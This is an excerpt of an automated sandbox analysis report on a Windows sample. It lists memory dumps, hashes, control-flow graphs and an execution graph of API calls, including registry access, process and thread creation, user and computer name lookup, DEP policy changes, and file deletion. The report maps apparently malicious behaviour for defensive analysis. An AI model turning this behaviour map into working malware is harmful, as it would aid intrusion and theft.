                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3266983031-0
                                                                                                                                                                                          • Opcode ID: 985607aebff6136b1778f8ff14b1f1c33eaf51cc4eef6287d5f470909748209d
                                                                                                                                                                                          • Instruction ID: 91bb17bd43d347dcd4531fdc855fd7abcf8bcbfe504f61127b71ba03a574cec5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 985607aebff6136b1778f8ff14b1f1c33eaf51cc4eef6287d5f470909748209d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E21EF71612B3099EB008B61F8843C937AAB748B88F58552AD94F23724EF3AC724C380
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00007FF790089E54 Relevance: 9.0, APIs: 6, Instructions: 47timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF790070000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294523077.00007FF790070000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294564988.00007FF79008C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294587403.00007FF79008D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ff790070000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4104442557-0
                                                                                                                                                                                          • Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                                                                                                                          • Instruction ID: 55e48057a3c6e899965bea9d96c39b0ed8792e0f34fe141c21300b32bc204253
                                                                                                                                                                                          • Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE113032614F81CAEF20DF78E85826973A4F749758F441A31EA6D47768DF3DE1A48350
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 613C1D20 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 154 613c1d20-613c1d39 155 613c1d3b-613c1d48 154->155 156 613c1d50-613c1da7 call 613c2a20 call 613c2e80 154->156 156->155 161 613c1da9-613c1dad 156->161 162 613c1daf-613c1db5 161->162 163 613c1dd5-613c1ddb 161->163 164 613c1dbb-613c1dc2 162->164 165 613c1f00-613c1f03 162->165 163->165 166 613c1de1-613c1de6 163->166 164->165 167 613c1dc8-613c1dcf 164->167 165->155 169 613c1f09-613c1f10 165->169 166->165 168 613c1dec-613c1df2 166->168 167->168 171 613c1dd1 167->171 172 613c200c-613c2031 call 613c1b40 168->172 173 613c1df8-613c1dff 168->173 170 613c1f14-613c1f36 call 613c1bb0 169->170 182 613c1f38 170->182 171->163 183 613c2050-613c2054 172->183 184 613c2033-613c204e 172->184 173->155 174 613c1e05-613c1e10 173->174 177 613c1e1a-613c1e2f 174->177 180 613c1e35 177->180 181 613c1f76-613c1fa6 call 613c1bb0 177->181 185 613c1f3d-613c1f40 180->185 186 613c1e3b-613c1e3e 180->186 191 613c1fab-613c1fba call 613c1b40 181->191 187 613c1e74-613c1e80 182->187 184->183 185->191 192 613c1f42-613c1f71 call 613c1bb0 185->192 189 613c1fbf-613c1fe9 call 613c1bb0 186->189 190 613c1e44-613c1e47 186->190 187->155 193 613c1e86-613c1e98 187->193 208 613c1fee-613c2007 call 613c1b40 189->208 190->191 197 613c1e4d-613c1e72 call 613c1bb0 190->197 191->189 192->181 199 613c1eb3-613c1ec1 193->199 197->177 197->187 204 613c1ea0-613c1ead 199->204 205 613c1ec3-613c1ed6 VirtualQuery 199->205 204->155 204->199 207 613c1edc-613c1ef5 VirtualProtect 205->207 205->208 207->204 208->172
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,?,?,?,?,613C4014,?,?,?,?,613C12F5), ref: 613C1ED0
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,613C4014,?,?,?,?,613C12F5), ref: 613C1EF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Unknown pseudo relocation bit size %d., xrefs: 613C1FAB
                                                                                                                                                                                          • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1CF1, 613C1FF5
                                                                                                                                                                                          • Unknown pseudo relocation protocol version %d., xrefs: 613C200C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$ProtectQuery
                                                                                                                                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                                                                                          • API String ID: 1027372294-974437099
                                                                                                                                                                                          • Opcode ID: 0506fc0812a6532e595ec5eb3817d96166fe1220901b1217ccaca6be0b2030cb
                                                                                                                                                                                          • Instruction ID: 8b19c1d28792cb56a2489f17691e3257573fe42bf3fac7028ea06e892639a53c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0506fc0812a6532e595ec5eb3817d96166fe1220901b1217ccaca6be0b2030cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2371DB76B11A25C5EB01CB66E98078A7372B744FECF88C216CD1E17758DB3AC905E782
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 613C20E0 Relevance: 7.6, APIs: 5, Instructions: 57timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32 ref: 613C2125
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 613C2130
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 613C2138
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 613C2140
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 613C214D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                          • Opcode ID: 74dd19f4e94a0d0c7d2f512cedf46a5700d2f37f9f80a699a897ab5269ff7fc9
                                                                                                                                                                                          • Instruction ID: f1121d54ed6ad7c6b44c785f3bc5d17666f8aeef939fc9792c255a14141ab0b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74dd19f4e94a0d0c7d2f512cedf46a5700d2f37f9f80a699a897ab5269ff7fc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD11BF36752A7086F7105B25F904385B262B788BE0F0C5231DE5E53BA4EA3EC9968340
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 613C1BB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 216 613c1bb0-613c1bde 217 613c1be2-613c1c09 216->217 219 613c1c0b-613c1c19 call 613c29d0 217->219 222 613c1c1f-613c1c6f call 613c2af0 VirtualQuery 219->222 223 613c1d02-613c1d39 call 613c1b40 219->223 229 613c1ce5-613c1cfd call 613c1b40 222->229 230 613c1c71-613c1c7b 222->230 231 613c1d3b-613c1d48 223->231 232 613c1d50-613c1da7 call 613c2a20 call 613c2e80 223->232 229->223 233 613c1c7d-613c1c83 230->233 234 613c1ca9-613c2f30 memcpy 230->234 232->231 241 613c1da9-613c1dad 232->241 233->234 242 613c1daf-613c1db5 241->242 243 613c1dd5-613c1ddb 241->243 244 613c1dbb-613c1dc2 242->244 245 613c1f00-613c1f03 242->245 243->245 246 613c1de1-613c1de6 243->246 244->245 247 613c1dc8-613c1dcf 244->247 245->231 249 613c1f09-613c1f10 245->249 246->245 248 613c1dec-613c1df2 246->248 247->248 251 613c1dd1 247->251 252 613c200c-613c2031 call 613c1b40 248->252 253 613c1df8-613c1dff 248->253 250 613c1f14-613c1f36 call 613c1bb0 249->250 262 613c1f38 250->262 251->243 263 613c2050-613c2054 252->263 264 613c2033-613c204e 252->264 253->231 254 613c1e05-613c1e10 253->254 257 613c1e1a-613c1e2f 254->257 260 613c1e35 257->260 261 613c1f76-613c1fa6 call 613c1bb0 257->261 265 613c1f3d-613c1f40 260->265 266 613c1e3b-613c1e3e 260->266 271 613c1fab-613c1fba call 613c1b40 261->271 267 613c1e74-613c1e80 262->267 264->263 265->271 272 613c1f42-613c1f71 call 613c1bb0 265->272 269 613c1fbf-613c1fe9 call 613c1bb0 266->269 270 613c1e44-613c1e47 266->270 267->231 273 613c1e86-613c1e98 267->273 288 613c1fee-613c2007 call 613c1b40 269->288 270->271 277 613c1e4d-613c1e72 call 613c1bb0 270->277 271->269 272->261 279 613c1eb3-613c1ec1 273->279 277->257 277->267 284 613c1ea0-613c1ead 279->284 285 613c1ec3-613c1ed6 VirtualQuery 279->285 284->231 284->279 287 613c1edc-613c1ef5 VirtualProtect 285->287 285->288 287->284 288->252
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Address %p has no image-section, xrefs: 613C1BB7, 613C1D02
                                                                                                                                                                                          • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1CF1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryVirtual
                                                                                                                                                                                          • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                                          • API String ID: 1804819252-157664173
                                                                                                                                                                                          • Opcode ID: 4b3442590c100849448ba3e56ea47b0cf678686d7b5a80ce58739232cc369298
                                                                                                                                                                                          • Instruction ID: bbd5546ac0f113b28ab3ae70c7fcc4ca9aee0ecfaac13d73c3aea7a86ca27076
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b3442590c100849448ba3e56ea47b0cf678686d7b5a80ce58739232cc369298
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71312477B01A64D5EA019F16EC04B967B65FB48FE8F48C121EE0E17320EB39DA42D740
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.4%
                                                                                                                                                                                          Signature Coverage:5.1%
                                                                                                                                                                                          Total number of Nodes:1887
                                                                                                                                                                                          Total number of Limit Nodes:57
                                                                                                                                                                                          execution_graph 108981 12364887 108982 12364893 CallCatchBlock 108981->108982 109008 12364596 108982->109008 108984 1236489a 108986 123648c3 108984->108986 109306 123649f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 108984->109306 108993 12364902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 108986->108993 109307 12374251 5 API calls ___crtLCMapStringA 108986->109307 108988 123648dc 108989 123648e2 CallCatchBlock 108988->108989 109308 123741f5 5 API calls ___crtLCMapStringA 108988->109308 108991 12364962 109019 12364b14 108991->109019 108993->108991 109309 123733e7 35 API calls 4 library calls 108993->109309 109001 12364984 109002 1236498e 109001->109002 109311 1237341f 28 API calls _Atexit 109001->109311 109004 12364997 109002->109004 109312 123733c2 28 API calls _Atexit 109002->109312 109313 1236470d 13 API calls 2 library calls 109004->109313 109007 1236499f 109007->108989 109009 1236459f 109008->109009 109314 12364c52 IsProcessorFeaturePresent 109009->109314 109011 123645ab 109315 12368f31 10 API calls 4 library calls 109011->109315 109013 123645b0 109014 123645b4 109013->109014 109316 123740bf 109013->109316 109014->108984 109017 123645cb 109017->108984 109388 12366e90 109019->109388 109021 12364b27 GetStartupInfoW 109022 12364968 109021->109022 109023 123741a2 109022->109023 109390 1237f059 109023->109390 109025 123741ab 109027 12364971 109025->109027 109394 12376815 35 API calls 109025->109394 109028 1233e9c5 109027->109028 109396 1234cb50 LoadLibraryA GetProcAddress 109028->109396 109030 1233e9e1 GetModuleFileNameW 109401 1233f3c3 109030->109401 109032 1233e9fd 109416 123320f6 109032->109416 109035 123320f6 28 API calls 109036 1233ea1b 109035->109036 109422 1234be1b 109036->109422 109040 1233ea2d 109448 12331e8d 109040->109448 109042 1233ea36 109043 1233ea93 109042->109043 109044 1233ea49 109042->109044 109454 12331e65 109043->109454 109712 1233fbb3 116 API calls 109044->109712 109047 1233eaa3 109051 12331e65 22 API calls 109047->109051 109048 1233ea5b 109049 12331e65 22 API calls 109048->109049 109050 1233ea67 109049->109050 109713 12340f37 36 API calls __EH_prolog 109050->109713 109052 1233eac2 109051->109052 109459 1233531e 109052->109459 109055 1233ead1 109464 12336383 109055->109464 109056 1233ea79 109714 1233fb64 77 API calls 109056->109714 109060 1233ea82 109715 1233f3b0 70 API calls 109060->109715 109066 12331fd8 11 API calls 109068 1233eefb 109066->109068 109067 12331fd8 11 API calls 109069 1233eafb 109067->109069 109310 123732f6 GetModuleHandleW 109068->109310 109070 12331e65 22 API calls 109069->109070 109071 1233eb04 109070->109071 109481 12331fc0 109071->109481 109073 1233eb0f 109074 12331e65 22 API calls 109073->109074 109075 1233eb28 109074->109075 109076 12331e65 22 API calls 109075->109076 109077 1233eb43 109076->109077 109078 1233ebae 109077->109078 109716 12336c1e 109077->109716 109079 12331e65 22 API calls 109078->109079 109085 1233ebbb 109079->109085 109081 1233eb70 109082 12331fe2 28 API calls 109081->109082 109083 1233eb7c 109082->109083 109086 12331fd8 11 API calls 109083->109086 109084 1233ec02 109485 1233d069 109084->109485 109085->109084 109091 12343549 3 API calls 109085->109091 109088 1233eb85 109086->109088 109721 12343549 RegOpenKeyExA 109088->109721 109089 1233ec08 109090 1233ea8b 109089->109090 109488 1234b2c3 109089->109488 109090->109066 109097 1233ebe6 109091->109097 109095 1233f34f 109814 123439a9 30 API calls 109095->109814 109096 1233ec23 109099 1233ec76 109096->109099 109505 12337716 109096->109505 109097->109084 109724 123439a9 30 API calls 109097->109724 109100 12331e65 22 API calls 109099->109100 109103 1233ec7f 109100->109103 109112 1233ec90 109103->109112 109113 1233ec8b 109103->109113 109105 1233f365 109815 12342475 65 API calls ___scrt_get_show_window_mode 109105->109815 109106 1233ec42 109725 12337738 30 API calls 109106->109725 109107 1233ec4c 109110 12331e65 22 API calls 109107->109110 109121 1233ec55 109110->109121 109111 1233f36f 109115 1234bc5e 28 API calls 109111->109115 109118 12331e65 22 API calls 109112->109118 109728 12337755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 109113->109728 109114 1233ec47 109726 12337260 97 API calls 109114->109726 109120 1233f37f 109115->109120 109119 1233ec99 109118->109119 109509 1234bc5e 109119->109509 109614 12343a23 RegOpenKeyExW 109120->109614 109121->109099 109127 1233ec71 109121->109127 109123 1233eca4 109513 12331f13 109123->109513 109727 12337260 97 API calls 109127->109727 109128 12331f09 11 API calls 109131 1233f39c 109128->109131 109134 12331f09 11 API calls 109131->109134 109136 1233f3a5 109134->109136 109135 12331e65 22 API calls 109137 1233ecc1 109135->109137 109617 1233dd42 109136->109617 109141 12331e65 22 API calls 109137->109141 109143 1233ecdb 109141->109143 109142 1233f3af 109144 12331e65 22 API calls 109143->109144 109145 1233ecf5 109144->109145 109146 12331e65 22 API calls 109145->109146 109147 1233ed0e 109146->109147 109148 1233ed7b 109147->109148 109149 12331e65 22 API calls 109147->109149 109150 1233ed8a 109148->109150 109155 1233ef06 ___scrt_get_show_window_mode 109148->109155 109154 1233ed23 _wcslen 109149->109154 109151 1233ed93 109150->109151 109176 1233ee0f ___scrt_get_show_window_mode 109150->109176 109152 12331e65 22 API calls 109151->109152 109153 1233ed9c 109152->109153 109156 12331e65 22 API calls 109153->109156 109154->109148 109157 12331e65 22 API calls 109154->109157 109789 123436f8 RegOpenKeyExA 109155->109789 109158 1233edae 109156->109158 109159 1233ed3e 109157->109159 109161 12331e65 22 API calls 109158->109161 109163 12331e65 22 API calls 109159->109163 109162 1233edc0 109161->109162 109166 12331e65 22 API calls 109162->109166 109164 1233ed53 109163->109164 109729 1233da34 109164->109729 109165 1233ef51 109167 12331e65 22 API calls 109165->109167 109169 1233ede9 109166->109169 109170 1233ef76 109167->109170 109174 12331e65 22 API calls 109169->109174 109535 12332093 109170->109535 109172 12331f13 28 API calls 109173 1233ed72 109172->109173 109177 12331f09 11 API calls 109173->109177 109178 1233edfa 109174->109178 109525 12343947 109176->109525 109177->109148 109787 1233cdf9 46 API calls _wcslen 109178->109787 109179 1233ef88 109541 1234376f RegCreateKeyA 109179->109541 109184 1233eea3 ctype 109188 12331e65 22 API calls 109184->109188 109185 1233ee0a 109185->109176 109186 12331e65 22 API calls 109187 1233efaa 109186->109187 109547 1236baac 109187->109547 109189 1233eeba 109188->109189 109189->109165 109192 1233eece 109189->109192 109194 12331e65 22 API calls 109192->109194 109193 1233efc1 109792 1234cd9b 87 API calls ___scrt_get_show_window_mode 109193->109792 109196 1233eed7 109194->109196 109195 1233efe4 109199 12332093 28 API calls 109195->109199 109198 1234bc5e 28 API calls 109196->109198 109202 1233eee3 109198->109202 109201 1233eff9 109199->109201 109200 1233efc8 CreateThread 109200->109195 111134 1234d45d 10 API calls 109200->111134 109204 12332093 28 API calls 109201->109204 109788 1233f474 113 API calls 109202->109788 109205 1233f008 109204->109205 109551 1234b4ef 109205->109551 109206 1233eee8 109206->109165 109207 1233eeef 109206->109207 109207->109090 109210 12331e65 22 API calls 109211 1233f019 109210->109211 109212 12331e65 22 API calls 109211->109212 109213 1233f02b 109212->109213 109214 12331e65 22 API calls 109213->109214 109215 1233f04b 109214->109215 109216 1236baac _strftime 39 API calls 109215->109216 109217 1233f058 109216->109217 109218 12331e65 22 API calls 109217->109218 109219 1233f063 109218->109219 109220 12331e65 22 API calls 109219->109220 109221 1233f074 109220->109221 109222 12331e65 22 API calls 109221->109222 109223 1233f089 109222->109223 109224 12331e65 22 API calls 109223->109224 109225 1233f09a 109224->109225 109226 1233f0a1 StrToIntA 109225->109226 109575 12339de4 109226->109575 109229 12331e65 22 API calls 109230 1233f0bc 109229->109230 109231 1233f101 109230->109231 109232 1233f0c8 109230->109232 109234 12331e65 22 API calls 109231->109234 109793 123644ea 109232->109793 109236 1233f111 109234->109236 109240 1233f159 109236->109240 109241 1233f11d 109236->109241 109237 12331e65 22 API calls 109238 1233f0e4 109237->109238 109239 1233f0eb CreateThread 109238->109239 109239->109231 111137 12349fb4 112 API calls 2 library calls 109239->111137 109242 12331e65 22 API calls 109240->109242 109243 123644ea new 22 API calls 109241->109243 109244 1233f162 109242->109244 109245 1233f126 109243->109245 109248 1233f16e 109244->109248 109249 1233f1cc 109244->109249 109246 12331e65 22 API calls 109245->109246 109247 1233f138 109246->109247 109252 1233f13f CreateThread 109247->109252 109251 12331e65 22 API calls 109248->109251 109250 12331e65 22 API calls 109249->109250 109254 1233f1d5 109250->109254 109253 1233f17e 109251->109253 109252->109240 111136 12349fb4 112 API calls 2 library calls 109252->111136 109257 12331e65 22 API calls 109253->109257 109255 1233f1e1 109254->109255 109256 1233f21a 109254->109256 109260 12331e65 22 API calls 109255->109260 109600 1234b60d GetComputerNameExW GetUserNameW 109256->109600 109259 1233f193 109257->109259 109800 1233d9e8 109259->109800 109262 1233f1ea 109260->109262 109268 12331e65 22 API calls 109262->109268 109263 12331f13 28 API calls 109264 1233f22e 109263->109264 109266 12331f09 11 API calls 109264->109266 109270 1233f237 109266->109270 109271 1233f1ff 109268->109271 109269 12331f13 28 API calls 109272 1233f1b2 109269->109272 109273 1233f243 CreateThread 109270->109273 109274 1233f240 SetProcessDEPPolicy 109270->109274 109281 1236baac _strftime 39 API calls 109271->109281 109275 12331f09 11 API calls 109272->109275 109276 1233f264 109273->109276 109277 1233f258 CreateThread 109273->109277 111107 1233f7a7 109273->111107 109274->109273 109280 1233f1bb CreateThread 109275->109280 109278 1233f279 109276->109278 109279 1233f26d CreateThread 109276->109279 109277->109276 111138 123420f7 145 API calls 109277->111138 109283 1233f2cc 109278->109283 109285 12332093 28 API calls 109278->109285 109279->109278 111139 123426db 38 API calls ___scrt_get_show_window_mode 109279->111139 109280->109249 111135 12331be9 49 API calls _strftime 109280->111135 109282 1233f20c 109281->109282 109811 1233c162 7 API calls 109282->109811 109611 123434ff RegOpenKeyExA 109283->109611 109286 1233f29c 109285->109286 109812 123352fd 28 API calls 109286->109812 109291 1233f2ed 109293 1234bc5e 28 API calls 109291->109293 109295 1233f2fd 109293->109295 109813 1234361b 31 API calls 109295->109813 109300 1233f313 109301 12331f09 11 API calls 109300->109301 109303 1233f31e 109301->109303 109302 1233f346 DeleteFileW 109302->109303 109304 1233f34d 109302->109304 109303->109111 109303->109302 109305 1233f334 Sleep 109303->109305 109304->109111 109305->109303 109306->108984 109307->108988 109308->108993 109309->108991 109310->109001 109311->109002 109312->109004 109313->109007 109314->109011 109315->109013 109320 1237fb68 109316->109320 109319 12368f5a 8 API calls 3 library calls 109319->109014 109323 1237fb85 109320->109323 109324 1237fb81 109320->109324 109322 123645bd 109322->109017 109322->109319 109323->109324 109326 12379ca6 109323->109326 109338 12364fcb 109324->109338 109327 12379cb2 CallCatchBlock 109326->109327 109345 12375888 EnterCriticalSection 109327->109345 109329 12379cb9 109346 12380183 109329->109346 109331 12379cc8 109332 12379cd7 109331->109332 109357 12379b3a 23 API calls 109331->109357 109359 12379cf3 LeaveCriticalSection std::_Lockit::~_Lockit 109332->109359 109335 12379ce8 CallCatchBlock 109335->109323 109336 12379cd2 109358 12379bf0 GetStdHandle GetFileType 109336->109358 109339 12364fd6 IsProcessorFeaturePresent 109338->109339 109340 12364fd4 109338->109340 109342 12365018 109339->109342 109340->109322 109387 12364fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 109342->109387 109344 123650fb 109344->109322 109345->109329 109347 1238018f CallCatchBlock 109346->109347 109348 1238019c 109347->109348 109349 123801b3 109347->109349 109368 123705dd 20 API calls __dosmaperr 109348->109368 109360 12375888 EnterCriticalSection 109349->109360 109352 123801eb 109369 12380212 LeaveCriticalSection std::_Lockit::~_Lockit 109352->109369 109353 123801a1 __cftof CallCatchBlock 109353->109331 109354 123801bf 109354->109352 109361 123800d4 109354->109361 109357->109336 109358->109332 109359->109335 109360->109354 109370 12375af3 109361->109370 109363 123800e6 109367 123800f3 109363->109367 109377 12378a84 11 API calls 2 library calls 109363->109377 109366 12380145 109366->109354 109378 12376782 109367->109378 109368->109353 109369->109353 109375 12375b00 __Getctype 109370->109375 109371 12375b40 109385 123705dd 20 API calls __dosmaperr 109371->109385 109372 12375b2b RtlAllocateHeap 109373 12375b3e 109372->109373 109372->109375 109373->109363 109375->109371 109375->109372 109384 12372f80 7 API calls 2 library calls 109375->109384 109377->109363 109379 1237678d RtlFreeHeap 109378->109379 109380 123767b6 _free 109378->109380 109379->109380 109381 123767a2 109379->109381 109380->109366 109386 123705dd 20 API calls __dosmaperr 109381->109386 109383 123767a8 GetLastError 109383->109380 109384->109375 109385->109373 109386->109383 109387->109344 109389 12366ea7 109388->109389 109389->109021 109389->109389 109391 1237f06b 109390->109391 109392 1237f062 109390->109392 109391->109025 109395 1237ef58 48 API calls 4 library calls 109392->109395 109394->109025 109395->109391 109397 1234cb8f LoadLibraryA GetProcAddress 109396->109397 109398 1234cb7f GetModuleHandleA GetProcAddress 109396->109398 109399 1234cbb8 44 API calls 109397->109399 109400 1234cba8 LoadLibraryA GetProcAddress 109397->109400 109398->109397 109399->109030 109400->109399 109816 1234b4a8 FindResourceA 109401->109816 109405 1233f3ed _Yarn 109826 123320b7 109405->109826 109408 12331fe2 28 API calls 109409 1233f413 109408->109409 109410 12331fd8 11 API calls 109409->109410 109411 1233f41c 109410->109411 109412 1236bd51 _Yarn 21 API calls 109411->109412 109413 1233f42d _Yarn 109412->109413 109832 12336dd8 109413->109832 109415 1233f460 109415->109032 109417 1233210c 109416->109417 109418 123323ce 11 API calls 109417->109418 109419 12332126 109418->109419 109420 12332569 28 API calls 109419->109420 109421 12332134 109420->109421 109421->109035 109896 123320df 109422->109896 109424 1234be9e 109425 12331fd8 11 API calls 109424->109425 109426 1234bed0 109425->109426 109427 12331fd8 11 API calls 109426->109427 109429 1234bed8 109427->109429 109428 1234bea0 109430 123341a2 28 API calls 109428->109430 109432 12331fd8 11 API calls 109429->109432 109433 1234beac 109430->109433 109434 1233ea24 109432->109434 109435 12331fe2 28 API calls 109433->109435 109444 1233fb17 109434->109444 109437 1234beb5 109435->109437 109436 12331fe2 28 API calls 109443 1234be2e 109436->109443 109438 12331fd8 11 API calls 109437->109438 109440 1234bebd 109438->109440 109439 12331fd8 11 API calls 109439->109443 109441 1234ce34 28 API calls 109440->109441 109441->109424 109443->109424 109443->109428 109443->109436 109443->109439 109900 123341a2 109443->109900 109903 1234ce34 109443->109903 109445 1233fb23 